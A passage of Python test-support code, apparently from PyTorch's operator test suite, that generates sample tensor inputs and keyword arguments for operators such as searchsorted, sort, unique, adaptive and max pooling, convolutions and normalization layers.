        sample_inputs.append(SampleInput(input_tensor, args=(boundaries, ),
                                         kwargs=dict(out_int32=out_int32, right=right)))

    return sample_inputs

def sample_inputs_searchsorted(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad)

    sizes = ((0,), (M,), (0, 0), (M, M), (0, 0, 0), (M, M, M))
    inputs = []
    for size, noncontiguous, out_int32, right in product(sizes, [False, True], [False, True], [False, True]):
        unsorted_tensor = make_arg(size, noncontiguous=noncontiguous)
        input_tensor = make_arg(size, noncontiguous=noncontiguous)
        if np.prod(size) == 0:
            boundary_tensor = unsorted_tensor
            sorter = make_tensor(size, dtype=torch.int64, device=device, noncontiguous=noncontiguous)
        else:
            boundary_tensor, sorter = torch.sort(unsorted_tensor)
        side = "right" if right else "left"

        inputs.append(SampleInput(boundary_tensor, args=(input_tensor,), kwargs=dict(out_int32=out_int32, right=right)))
        inputs.append(SampleInput(boundary_tensor, args=(input_tensor,), kwargs=dict(out_int32=out_int32, side=side)))

        inputs.append(
            SampleInput(unsorted_tensor, args=(input_tensor,),
                        kwargs=dict(out_int32=out_int32, right=right, sorter=sorter)))
        inputs.append(
            SampleInput(unsorted_tensor, args=(input_tensor,),
                        kwargs=dict(out_int32=out_int32, side=side, sorter=sorter)))
    return inputs

def sample_inputs_gradient(op_info, device, dtype, requires_grad, **kwargs):
    sample_inputs = []
    test_cases_float = (
        ((S,), None, None, 1),
        ((S,), 2., None, 1),
        ((S, S), None, None, 2),
        ((S, S), [2.0, 2.1], None, 1),
        ((S, S), [2.0, 2.1], (0, 1), 1),
        ((4, 4, 4), [2., 1.], (0, 1), 2),
    )
    for size, spacing, dim, edge_order in test_cases_float:
        t = make_tensor(size, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad)
        sample_inputs.append(SampleInput(t, kwargs=dict(dim=dim, spacing=spacing, edge_order=edge_order)))

    test_cases_tensor = (
        ((3, 3, 3), ((1.1, 2.0, 3.5), (4.0, 2, 6.0)), (0, -1), 1),
        ((3, 3, 3), ((1.0, 3.0, 2.0), (8.0, 6.0, 1.0)), (0, 1), 2),
    )
    for size, coordinates, dim, edge_order in test_cases_tensor:
        t = make_tensor(size, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad)
        coordinates_tensor_list = []
        for coords in coordinates:
            # `coords` will always contain floating point values and Python 3.10 does not support this
            # implicit conversion to an integer using `__int__`
            # TODO: this can be simplified after https://github.com/pytorch/pytorch/issues/69316 is fixed
            a = torch.tensor(coords, device=device)
            coordinates_tensor_list.append(a.to(dtype))
        sample_inputs.append(SampleInput(t, kwargs=dict(dim=dim, spacing=coordinates_tensor_list, edge_order=edge_order)))

    return tuple(sample_inputs)
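# Illustrative sketch (assumption: not part of the original suite): replaying a
# gradient sample; torch.gradient returns one tensor per differentiated dim.
def _example_consume_gradient_samples():
    grads = []
    for sample in sample_inputs_gradient(None, 'cpu', torch.float32, requires_grad=False):
        grads.append(torch.gradient(sample.input, **sample.kwargs))
    return grads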
def sample_inputs_getitem(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad)
    test_args = [
        ([1, 2],),
        (slice(0, 3),),
        ([slice(0, 3), 1],),
        ([[0, 2, 3], [1, 3, 3], [0, 0, 2]],),
        ([[0, 0, 3], [1, 1, 3], [0, 0, 2]],),
        ([slice(None), slice(None), [0, 3]],),
        ([slice(None), [0, 3], slice(None)],),
        ([[0, 3], slice(None), slice(None)],),
        ([[0, 3], [1, 2], slice(None)],),
        ([[0, 3], ],),
        ([[0, 3], slice(None)],),
        ([[0, 3], Ellipsis],),
        ([[0, 2, 3], [1, 3, 3], torch.LongTensor([0, 0, 2])],),
        (index_variable(2, S, device=device),),
        (mask_not_all_zeros((S,)),),
    ]

    for args in test_args:
        yield SampleInput(make_arg((S, S, S)), args=args)

    yield SampleInput(make_arg((S, S, S, S)), args=([slice(None), [0, 1], slice(None), [0, 1]],))

def sample_inputs_index_put(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad)

    inputs = []
    for accumulate in [False, True]:
        # Test with indices arg
        inputs.append(SampleInput(
            make_arg((S, S,)),
            args=((index_variable(2, S, device=device),), make_arg((2, S))),
            kwargs=dict(accumulate=accumulate)))

        # Test with mask arg
        mask = torch.zeros(S, dtype=torch.bool) if accumulate else mask_not_all_zeros((S,))
        inputs.append(SampleInput(
            make_arg((S, S)),
            args=((mask, ), make_arg((S,))),
            kwargs=dict(accumulate=accumulate)))

    return inputs

def sample_inputs_sort(op_info, device, dtype, requires_grad, **kwargs):
    def small_3d_unique():
        res = torch.randperm(S * S * S, dtype=torch.int64, device=device).view(S, S, S)
        res = res.to(dtype).requires_grad_(requires_grad)
        return res

    def large_1d_unique():
        res = torch.randperm(L * L * L, dtype=torch.int64, device=device)
        res = res.to(dtype).requires_grad_(requires_grad)
        return res

    samples = []
    # Test case for large tensor.
    samples.append(SampleInput(large_1d_unique()))

    # Test cases for small 3d tensors.
    # Imitates legacy tests from test/test_torch.py
    dims = range(-3, 3)
    flag = [True, False]
    for dim, descending, stable in product(dims, flag, flag):
        # default schema without stable sort
        samples.append(SampleInput(small_3d_unique(), args=(dim, descending)))
        # schema with stable sort, no CUDA support yet
        if torch.device(device).type == 'cpu':
            samples.append(
                SampleInput(small_3d_unique(),
                            kwargs=dict(dim=dim, descending=descending, stable=stable))
            )

    # Test cases for scalar tensor
    samples.append(SampleInput(torch.tensor(1, dtype=dtype, device=device, requires_grad=requires_grad)))
    samples.append(SampleInput(torch.tensor(1, dtype=dtype, device=device, requires_grad=requires_grad), args=(0,)))
    samples.append(SampleInput(torch.tensor(1, dtype=dtype, device=device, requires_grad=requires_grad), args=(0, True)))

    # Test cases for stable sort
    samples.append(SampleInput(small_3d_unique(), kwargs=dict(stable=True)))
    samples.append(SampleInput(small_3d_unique(), kwargs=dict(dim=0, stable=True)))
    samples.append(SampleInput(small_3d_unique(), kwargs=dict(dim=0, descending=True, stable=True)))

    return samples

def sample_inputs_threshold(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad)

    sizes = ((), (S,), (S, S), (S, S, S))
    samples = []
    for x_size in sizes:
        # threshold and values args must be numbers
        samples.append(SampleInput(make_arg(x_size), args=(make_arg(()).item(), make_arg(()).item())))

    return samples

def sample_inputs_argsort(*args, **kwargs):
    return [sample_input for sample_input in sample_inputs_sort(*args, **kwargs)
            if "stable" not in sample_input.kwargs]
def sample_inputs_unique(op_info, device, dtype, requires_grad, **kwargs):
    sizes = ((), (S,), (S, S), (S, S, S), (S, 1, S), (S, 0, S))

    sample_inputs = []
    for shape, sorted, return_inverse, return_counts, dim in \
            product(sizes, [False, True], [False, True], [False, True], [None, -2, -1, 0, 1, 2]):
        # torch.unique cannot be called if the input tensor has a zero dimension which isn't the selected dim
        if 0 in shape and shape.index(0) != dim:
            continue

        # skip invalid dim args
        if dim is not None and (dim < -len(shape) or dim >= len(shape)):
            continue

        kwargs = dict(sorted=sorted, return_inverse=return_inverse, return_counts=return_counts, dim=dim)

        # construct a test case with only one distinct value
        input_t = torch.zeros(shape, dtype=dtype, device=device, requires_grad=requires_grad)
        sample_inputs.append(SampleInput(input_t, kwargs=kwargs.copy()))

        # construct a test case with mixed 0s and 1s
        input_t = make_tensor(shape, dtype=torch.bool, device=device, requires_grad=False)\
            .to(dtype).requires_grad_(requires_grad)
        sample_inputs.append(SampleInput(input_t, kwargs=kwargs.copy()))

        # construct a test case with many different values
        input_t = make_tensor(shape, dtype=dtype, device=device, requires_grad=requires_grad)
        sample_inputs.append(SampleInput(input_t, kwargs=kwargs.copy()))

    return sample_inputs

def sample_inputs_unique_consecutive(*args, **kwargs):
    for sample_input in sample_inputs_unique(*args, **kwargs):
        if not sample_input.kwargs["sorted"]:
            sample_input.kwargs.pop("sorted")
            yield sample_input

def sample_inputs_adaptive_avg_pool1d(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)

    # Ordered as (input shape, output size)
    cases = (
        ((0, 8, 8), (5,)),
        ((3, 8, 8), 5),
        ((3, 8, 8), 1)
    )

    for input_shape, output_size in cases:
        # Batched
        yield SampleInput(make_arg(input_shape), args=(output_size,))
        # Unbatched
        yield SampleInput(make_arg(input_shape[1:]), args=(output_size,))

def sample_inputs_adaptive_avg_pool2d(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)

    # Ordered as (input shape, output size)
    cases = (
        ((1, 8, 8, 8), (5, 7)),
        ((2, 8, 8, 8), (None, 7)),
        ((1, 8, 4, 3), (5, None)),
        ((1, 8, 4, 3), (None, None)),
        ((1, 8, 4, 3), (5)),
    )

    for input_shape, output_size in cases:
        # Batched
        yield SampleInput(make_arg(input_shape), args=(output_size,))
        # Unbatched
        yield SampleInput(make_arg(input_shape[1:]), args=(output_size,))

def sample_inputs_adaptive_avg_pool3d(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)

    # Ordered as (input shape, output size)
    cases = (
        ((0, 8, 8, 8, 8), (5, 7, 4)),
        ((1, 8, 4, 3, 7), (None, None, None)),
        ((1, 8, 4, 3, 7), (1, 1, 1)),
        ((3, 3, 8, 8, 6), (5, 7, None)),
        ((1, 3, 8, 8, 6), (5, None, 2)),
        ((3, 3, 8, 8, 6), (None, 3, 2)),
    )

    for input_shape, output_size in cases:
        # Batched
        yield SampleInput(make_arg(input_shape), args=(output_size,))
        # Unbatched
        yield SampleInput(make_arg(input_shape[1:]), args=(output_size,))
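# Illustrative sketch (assumption: not part of the original suite): the adaptive
# pooling samples plug straight into the functional API; output sizes may
# contain None entries, which adaptive pooling accepts.
def _example_consume_adaptive_avg_pool2d_samples():
    import torch.nn.functional as F
    outs = []
    for sample in sample_inputs_adaptive_avg_pool2d(None, 'cpu', torch.float32, requires_grad=False):
        outs.append(F.adaptive_avg_pool2d(sample.input, *sample.args))
    return outs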
def sample_inputs_adaptive_max_pool1d(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)

    # Ordered as (input shape, output size)
    cases = (
        # ((0, 8, 8), (5,)),
        # 0 batch size doesn't work, cannot reshape tensor of 0 elements into shape [0, 8, -1]
        ((3, 4, 4), 3),
        ((3, 4, 4), 1)
    )

    for shapes, return_idx in product(cases, (True, False)):
        # Batched
        yield SampleInput(make_arg(shapes[0]), args=(shapes[1], return_idx))
        # Unbatched
        yield SampleInput(make_arg(shapes[0][1:]), args=(shapes[1], return_idx))

def sample_inputs_adaptive_max_pool2d(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)

    # Ordered as (input shape, output size)
    cases = (
        # ((0, 8, 8, 8), (5, 7)),
        # 0 batch size doesn't work, cannot reshape tensor of 0 elements into shape [0, 8, -1]
        ((1, 4, 4, 4), (2, 3)),
        ((2, 4, 4, 4), (None, 3)),
        ((2, 4, 4, 4), (1, 1)),
        ((1, 4, 4, 3), (3, None)),
        ((1, 4, 4, 3), (None, None)),
        ((1, 4, 4, 3), (3)),
    )

    for shapes, return_idx in product(cases, (True, False)):
        # Batched
        yield SampleInput(make_arg(shapes[0]), args=(shapes[1], return_idx))
        # Unbatched
        yield SampleInput(make_arg(shapes[0][1:]), args=(shapes[1], return_idx))

def sample_inputs_adaptive_max_pool3d(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)

    # Ordered as (input shape, output size)
    cases = (
        # ((0, 8, 8, 8, 8), (5, 7, 4)),
        # 0 batch size doesn't work, cannot reshape tensor of 0 elements into shape [0, 8, -1]
        ((1, 4, 4, 3, 5), (None, None, None)),
        ((1, 4, 4, 3, 5), (1, 1, 1)),
        ((3, 3, 4, 4, 6), (2, 3, None)),
        ((1, 3, 4, 4, 6), (3, None, 2)),
        ((3, 3, 4, 4, 6), (None, 3, 2)),
    )

    for shapes, return_idx in product(cases, (True, False)):
        # Batched
        yield SampleInput(make_arg(shapes[0]), args=(shapes[1], return_idx))
        # Unbatched
        yield SampleInput(make_arg(shapes[0][1:]), args=(shapes[1], return_idx))

class _TestParamsMaxPoolBase(object):

    def __init__(self):
        self.kwargs = {
            'kernel_size': [3],
            'stride': [2, None],
            'ceil_mode': [True, False],
            'padding': [0, 1],
            'dilation': [1],
            'return_indices': [True, False]
        }

        self.shapes = [
            [1, 2, None],  # batch
            [2],  # channels
            [3, 6]  # signal
        ]

    def _gen_shape(self):
        for shape in product(*self.shapes):
            # shape[0] is None indicates missing batch dimension
            if shape[0] is None:
                shape = shape[1:]

            yield shape, torch.contiguous_format
            # only 2d (N, C, H, W) rank 4 tensors support channels_last memory format
            if len(self.shapes) == 4 and len(shape) == 4:
                yield shape, torch.channels_last

    def _gen_kwargs(self):
        keys = self.kwargs.keys()
        for values in product(*self.kwargs.values()):
            yield dict(zip(keys, values))

    def gen_input_params(self):
        yield from product(self._gen_shape(), self._gen_kwargs())

class _TestParamsMaxPool1d(_TestParamsMaxPoolBase):

    def __init__(self):
        super().__init__()
        self.kwargs['kernel_size'] += [(3,)]
        self.kwargs['stride'] += [(2,)]
        self.kwargs['padding'] += [(1,)]
        self.kwargs['dilation'] += [(1,)]

class _TestParamsMaxPool2d(_TestParamsMaxPoolBase):

    def __init__(self):
        super().__init__()
        self.kwargs['kernel_size'] += [(3, 2)]
        self.kwargs['stride'] += [(2, 1)]
        self.kwargs['padding'] += [(1, 1)]
        self.kwargs['dilation'] += [(1, 2)]

        self.shapes.append([6])

class _TestParamsMaxPool3d(_TestParamsMaxPoolBase):

    def __init__(self):
        super().__init__()
        self.kwargs['kernel_size'] += [(3, 2, 3)]
        self.kwargs['stride'] += [(2, 1, 2)]
        self.kwargs['dilation'] += [(1, 2, 1)]

        self.shapes.append([6])
        self.shapes.append([5])
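# Illustrative sketch (assumption: not part of the original suite): each item
# from gen_input_params() is a ((shape, memory_format), kwargs) pair, e.g.
# (((1, 2, 3), torch.contiguous_format), {'kernel_size': 3, 'stride': 2, ...}).
def _example_peek_max_pool1d_params(n=3):
    params = _TestParamsMaxPool1d().gen_input_params()
    return list(islice(params, n))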
def sample_inputs_max_pool(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=False)

    params_generator_type_dict = {
        'nn.functional.max_pool1d': _TestParamsMaxPool1d,
        'nn.functional.max_pool2d': _TestParamsMaxPool2d,
        'nn.functional.max_pool3d': _TestParamsMaxPool3d,
    }

    params_generator = params_generator_type_dict[op_info.name]()
    for (shape, memory_format), kwargs in params_generator.gen_input_params():
        arg = make_arg(shape).to(memory_format=memory_format).requires_grad_(requires_grad)
        yield SampleInput(arg, kwargs=kwargs)

def sample_inputs_normalize(self, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, low=-1, high=1, device=device, dtype=dtype, requires_grad=requires_grad)

    cases: Tuple[Tuple[int], dict] = (  # type: ignore[assignment]
        ((2, 1, 4, 5), {'p': 1., 'dim': 2}),
        ((2, 3, 4, 5), {'p': 2., 'dim': 1}),
        ((1, 2, 4, 5), {'p': 0.5, 'dim': 0}),
        ((1, 3, 4, 5), {'p': -1., 'dim': 1}),
        ((1, 3, 4, 5), {'p': 0., 'dim': -1}),
        ((), {'p': 1.2, 'dim': 0}),
        ((2, 3, 4, 5), {}),
        ((2, 3, 4, 5), {'eps': 1e-4}))

    for input_shape, kwargs in cases:
        yield SampleInput(make_arg(input_shape), kwargs=kwargs)

def sample_inputs_conv_transpose1d(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)

    # Ordered as shapes for input, weight, bias
    # and a dict of values of (stride, padding, output_padding, groups, dilation)
    cases: Tuple[Tuple[int], Tuple[int], Tuple[int], dict] = (  # type: ignore[assignment]
        ((1, 3, 4), (3, 3, 3), (3,),
         {'stride': (2,), 'padding': 2, 'output_padding': (1,), 'groups': 1}),
        ((2, 2, 4), (2, 2, 4), (4,),
         {'stride': (3,), 'padding': (1,), 'output_padding': (2,), 'groups': 2, 'dilation': (4,)}),
        ((1, 1, 4), (1, 1, 4), (1,),
         {'stride': 2, 'padding': 1, 'output_padding': 1, 'groups': 1, 'dilation': (2,)}),
        ((1, 1, 4), (1, 2, 3), None,
         {'stride': 2, 'padding': 1, 'output_padding': 1, 'groups': 1}),
        ((1, 4, 5), (4, 8, 3), None,
         {})
    )

    for input_shape, weight, bias, kwargs in cases:
        # Batched
        yield SampleInput(make_arg(input_shape), args=(
            make_arg(weight),
            make_arg(bias) if bias is not None else bias
        ), kwargs=kwargs)
        # Unbatched
        yield SampleInput(make_arg(input_shape[1:]), args=(
            make_arg(weight),
            make_arg(bias) if bias is not None else bias
        ), kwargs=kwargs)

def sample_inputs_conv_transpose2d(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)

    # Ordered as shapes for input, weight, bias
    # and a dict of values of (stride, padding, output_padding, groups, dilation)
    cases: Tuple[Tuple[int], Tuple[int], Tuple[int], dict] = (  # type: ignore[assignment]
        ((1, 3, 4, 4), (3, 3, 3, 3), (3,),
         {'stride': (2, 2), 'padding': 2, 'output_padding': (1, 1), 'groups': 1}),
        ((2, 2, 4, 4), (2, 2, 4, 5), (4,),
         {'stride': (3, 2), 'padding': (1, 2), 'output_padding': (2, 3), 'groups': 2, 'dilation': (4, 4)}),
        ((1, 1, 4, 5), (1, 1, 4, 3), (1,),
         {'stride': 2, 'padding': 1, 'output_padding': 1, 'groups': 1, 'dilation': (2, 3)}),
        ((1, 1, 4, 3), (1, 2, 3, 4), None,
         {'stride': 2, 'padding': 1, 'output_padding': 1, 'groups': 1}),
        ((1, 4, 5, 5), (4, 8, 3, 3), None,
         {})
    )

    for input_shape, weight, bias, kwargs in cases:
        # Batched
        yield SampleInput(make_arg(input_shape), args=(
            make_arg(weight),
            make_arg(bias) if bias is not None else bias
        ), kwargs=kwargs)
        # Unbatched
        yield SampleInput(make_arg(input_shape[1:]), args=(
            make_arg(weight),
            make_arg(bias) if bias is not None else bias
        ), kwargs=kwargs)
def sample_inputs_conv_transpose3d(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)

    # Ordered as shapes for input, weight, bias
    # and a dict of values of (stride, padding, output_padding, groups, dilation)
    cases: Tuple[Tuple[int], Tuple[int], Tuple[int], dict] = (  # type: ignore[assignment]
        ((1, 3, 4, 4, 4), (3, 3, 3, 3, 3), (3,),
         {'stride': (2, 2, 2), 'padding': 2, 'output_padding': (1, 1, 1), 'groups': 1}),
        ((2, 2, 4, 4, 4), (2, 2, 4, 5, 6), (4,),
         {'stride': (3, 2, 1), 'padding': (1, 2, 3), 'output_padding': (2, 3, 1), 'groups': 2, 'dilation': (4, 4, 4)}),
        ((1, 1, 4, 5, 2), (1, 1, 4, 3, 1), (1,),
         {'stride': 2, 'padding': 1, 'output_padding': 1, 'groups': 1, 'dilation': (2, 3, 2)}),
        ((1, 1, 4, 3, 4), (1, 2, 3, 4, 5), None,
         {'stride': 2, 'padding': 1, 'output_padding': 1, 'groups': 1}),
        ((1, 4, 5, 5, 5), (4, 8, 3, 3, 3), None,
         {})
    )

    for input_shape, weight, bias, kwargs in cases:
        # Batched
        yield SampleInput(make_arg(input_shape), args=(
            make_arg(weight),
            make_arg(bias) if bias is not None else bias
        ), kwargs=kwargs)
        # Unbatched
        yield SampleInput(make_arg(input_shape[1:]), args=(
            make_arg(weight),
            make_arg(bias) if bias is not None else bias
        ), kwargs=kwargs)

def sample_inputs_conv1d(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)

    # Ordered as shapes for input, weight, bias,
    # and a dict of values of (stride, padding, dilation, groups)
    cases: Tuple = (
        ((1, 3, 4), (3, 3, 3), (3,), {'stride': (2,), 'padding': 2, 'groups': 1}),
        ((2, 4, 8), (2, 2, 3), (2,), {'stride': 3, 'padding': 1, 'groups': 2, 'dilation': 2}),
        ((1, 4, 5), (1, 4, 3), None, {'stride': (2,), 'padding': 'valid'}),
        ((2, 2, 4), (2, 1, 4), (2,), {'stride': (1,), 'padding': 'same', 'groups': 2, 'dilation': (2,)}),
        # With defaults
        ((1, 4, 5), (3, 4, 3), None, {}),
    )

    # TODO: (@krshrimali), add error_inputs_func once https://github.com/pytorch/pytorch/pull/67354 is merged
    # Should replace test_conv_modules_raise_error_on_incorrect_input_size and test_conv_shapecheck
    # in test/test_nn.py

    for input_shape, weight, bias, kwargs in cases:
        # Batched
        yield SampleInput(make_arg(input_shape), args=(
            make_arg(weight),
            make_arg(bias) if bias is not None else bias
        ), kwargs=kwargs)
        # Unbatched
        yield SampleInput(make_arg(input_shape[1:]), args=(
            make_arg(weight),
            make_arg(bias) if bias is not None else bias
        ), kwargs=kwargs)
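# Illustrative sketch (assumption: not part of the original suite): conv samples
# store (weight, bias) as positional args and conv options as kwargs, so they
# replay directly through the functional API; recent PyTorch versions also
# accept the unbatched (2-D) variants.
def _example_consume_conv1d_samples():
    import torch.nn.functional as F
    outs = []
    for sample in sample_inputs_conv1d(None, 'cpu', torch.float32, requires_grad=False):
        outs.append(F.conv1d(sample.input, *sample.args, **sample.kwargs))
    return outs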
def sample_inputs_conv2d(op_info, device, dtype, requires_grad, jit_fail_sample=False, **kwargs):
    make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)

    # Ordered as shapes for input, weight, bias
    # and a dict of values of (stride, padding, groups, dilation)
    cases: Tuple = (
        ((1, 3, 4, 4), (3, 3, 3, 3), (3,),
         {'stride': (2, 2), 'padding': 2, 'groups': 1}),
        ((2, 4, 8, 8), (2, 2, 3, 3), (2,),
         {'stride': (3, 2), 'padding': (2, 1), 'groups': 2, 'dilation': (4, 4)}),
        ((1, 4, 5, 5), (1, 4, 2, 3), (1,),
         {'stride': 2, 'padding': 1, 'groups': 1, 'dilation': (2, 3)}),
        ((1, 4, 5, 5), (1, 4, 2, 3), (1,),
         {'stride': 2, 'padding': 1, 'groups': 1, 'dilation': (2, 3)}),
        ((1, 2, 4, 3), (4, 2, 3, 4), None,
         {'stride': 2, 'padding': 1, 'groups': 1}),
        ((1, 4, 5, 5), (1, 4, 2, 3), (1,),
         {'stride': 2, 'padding': "valid"}),
        ((1, 4, 5, 5), (1, 4, 2, 3), (1,),
         {'stride': 1, 'padding': "same", 'dilation': 3}),
        # Below are the group related samples from common_nn.py
        ((2, 4, 6, 6), (4, 1, 3, 3), (4,), {'groups': 4}),
        ((2, 4, 6, 6), (8, 1, 3, 3), (8,), {'groups': 4}),
        ((2, 4, 6, 6), (8, 1, 3, 3), None, {'groups': 4}),
        ((2, 4, 6, 6), (4, 1, 3, 3), (4,), {'groups': 4, 'stride': (3, 2)}),
        ((2, 4, 6, 6), (4, 1, 3, 3), (4,), {'groups': 4, 'padding': (1, 1)}),
        ((2, 4, 5, 5), (4, 1, 2, 2), (4,), {'groups': 4, 'dilation': (2, 2)}),
        ((2, 4, 6, 5), (6, 2, 3, 2), (6,), {'groups': 2}),
        # With defaults
        ((1, 4, 5, 5), (3, 4, 3, 3), None, {}),
    )

    for input_shape, weight, bias, kwargs in cases:
        # Batched
        yield SampleInput(make_arg(input_shape), args=(
            make_arg(weight),
            make_arg(bias) if bias is not None else bias
        ), kwargs=kwargs)
        # Unbatched
        yield SampleInput(make_arg(input_shape[1:]), args=(
            make_arg(weight),
            make_arg(bias) if bias is not None else bias
        ), kwargs=kwargs)

def sample_inputs_group_norm(opinfo, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)

    # Ordered as input shape, num groups, and eps
    cases: Tuple[Tuple[int], int, float] = (  # type: ignore[assignment]
        ((1, 6, 3), 2, 0.5),
        ((2, 6, 3), 2, -0.5),
        ((1, 2), 1, None),
        ((0, 2), 1, None),
    )

    for input_shape, num_groups, eps in cases:
        # Shape of weight and bias should be the same as num_channels
        weight = make_arg(input_shape[1])
        bias = make_arg(input_shape[1])
        kwargs = {'weight': weight, 'bias': bias} if eps is None else {'weight': weight, 'bias': bias, 'eps': eps}
        yield SampleInput(
            make_arg(input_shape),
            args=(num_groups,),
            kwargs=kwargs
        )
    # Without any optional args
    yield SampleInput(make_arg((1, 2)), args=(1,))

def sample_inputs_instance_norm(opinfo, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)
    make_arg_without_requires_grad = partial(make_tensor, device=device, dtype=dtype, requires_grad=False)

    # Ordered as: input shape, kwargs for momentum, eps
    cases: Tuple[Tuple[int], dict] = (  # type: ignore[assignment]
        ((S, S, S), {'momentum': 0.5, 'eps': 0.6}),
        ((S, S, S), {'momentum': 0.5, 'eps': 0.6, 'use_input_stats': True}),
        ((3, 2, 4), {'momentum': -1.2}),
        ((3, 2, 4), {'momentum': 0.0}),
        ((3, 2, 3, 4), {'momentum': -1.0, 'eps': 0.5}),
        ((3, 2, 3, 4), {'momentum': -1.0, 'eps': 0.5}),
    )

    for input_shape, kwargs in cases:
        # args: running mean, running var, weight and bias should necessarily be of shape: (channels,)
        channels = input_shape[1]
        weight = make_arg(channels)
        bias = make_arg(channels)
        running_mean = make_arg_without_requires_grad(channels, low=0)
        running_var = make_arg_without_requires_grad(channels, low=0)
        new_kwargs = {
            'running_mean': running_mean,
            'running_var': running_var,
            'weight': weight,
            'bias': bias,
            **kwargs
        }

        yield SampleInput(
            make_arg(input_shape),
            args=(),
            kwargs=new_kwargs
        )

    # Checking for permutations of weights and biases as `None`
    # instance_norm assumes that if there's a bias, there's a weight
    weights = [channels, None]
    biases = [None, None]

    for weight_channels, bias_channels in zip(weights, biases):
        running_mean = make_arg_without_requires_grad(channels, low=0)
        running_var = make_arg_without_requires_grad(channels, low=0)
        yield SampleInput(
            make_arg(input_shape),
            args=(),
            kwargs={
                'running_mean': running_mean,
                'running_var': running_var,
                'weight': make_arg(weight_channels) if weight_channels is not None else None,
                'bias': make_arg(bias_channels) if bias_channels is not None else None
            }
        )

    # Test case for no optional kwargs
    yield SampleInput(make_arg((1, 2, 3)), kwargs={})
def sample_inputs_layer_norm(opinfo, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)

    # Ordered as input shape, normalized_shape and a kwarg dict for eps
    cases: Tuple[Tuple[int], Tuple[int], dict] = (  # type: ignore[assignment]
        ((1, 2, 3), (1, 2, 3), {'eps': 0.5}),
        ((2, 2, 3), (2, 3), {'eps': -0.5}),
        ((1,), (1,), {}),
        ((1, 2), (2,), {}),
        ((0, 1), (1,), {}),
    )

    for input_shape, normalized_shape, kwargs in cases:
        # Shape of weight and bias should be the same as normalized_shape
        weight = make_arg(normalized_shape)
        bias = make_arg(normalized_shape)
        yield SampleInput(
            make_arg(input_shape),
            args=(normalized_shape, weight, bias),
            kwargs=kwargs
        )
    # Without any optional args
    yield SampleInput(make_arg((1, 2)), args=((2,),))

    # TODO: @krshrimali, once to_numpy method in SampleInput class is modified to take None inputs,
    # enable these inputs; see https://github.com/pytorch/pytorch/pull/63276#discussion_r691950400

    # With weight and a `None` bias
    # yield SampleInput(make_arg((1, 2)), args=((2,), make_arg((2,)), None))

    # With `None` weight and bias (tests failing for this, see the link above)
    # yield SampleInput(make_arg((1, 2)), args=((2,), None, make_arg((2,))))

def sample_inputs_local_response_norm(opinfo, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)

    # Ordered as input shape, size and a kwarg dict for alpha, beta, and k
    cases: Tuple[Tuple[int], Tuple[int], dict] = (  # type: ignore[assignment]
        ((1, 6, 3), 2, {'alpha': 3e-05, 'beta': 0.5, 'k': 1.25}),
        ((1, 6, 3), 2, {'beta': 0.5, 'k': 1.25}),
        ((1, 6, 3), 2, {'alpha': 3e-05, 'k': 1.25}),
        ((1, 6, 3), 2, {'alpha': 3e-05, 'beta': 0.5}),
        ((1, 6, 3), 2, {'alpha': 3e-05}),
        ((1, 6, 3), 2, {'beta': 0.5}),
        ((1, 6, 3), 2, {'k': 1.25}),
        ((1, 6, 3), 2, {}),
        ((2, 6, 3), 2, {'alpha': 3e-05, 'beta': 0.5, 'k': 1.25}),
        ((1, 1, 2), 1, {'alpha': 3e-05, 'beta': 0.5, 'k': 1.25}),
        ((0, 1, 2), 1, {'alpha': 3e-05, 'beta': 0.5, 'k': 1.25}),
    )

    for input_shape, size, kwargs in cases:
        yield SampleInput(make_arg(input_shape), args=(size,), kwargs=kwargs)

def sample_inputs_hardswish(self, device, dtype, requires_grad, **kwargs):
    N = 5
    # make sure we are testing -3 -> 3 range. default is -10 -> 10 so maybe unnecessary ?
    tensors = [SampleInput(make_tensor((N * 2, N * 2), device=device, dtype=dtype,
               requires_grad=requires_grad, low=-5, high=5)) for _ in range(1, N)]
    return tensors

def sample_inputs_linear(self, device, dtype, requires_grad, **kwargs):
    features_options = [[3, 4], [8, 8]]
    batch_options: List[List[int]] = [
        [],  # no batch
        [0],
        [8],
        [2, 3],
    ]
    create_tensor = partial(make_tensor, device=device, dtype=dtype,
                            requires_grad=requires_grad, low=-2, high=2)

    sample_inputs = []
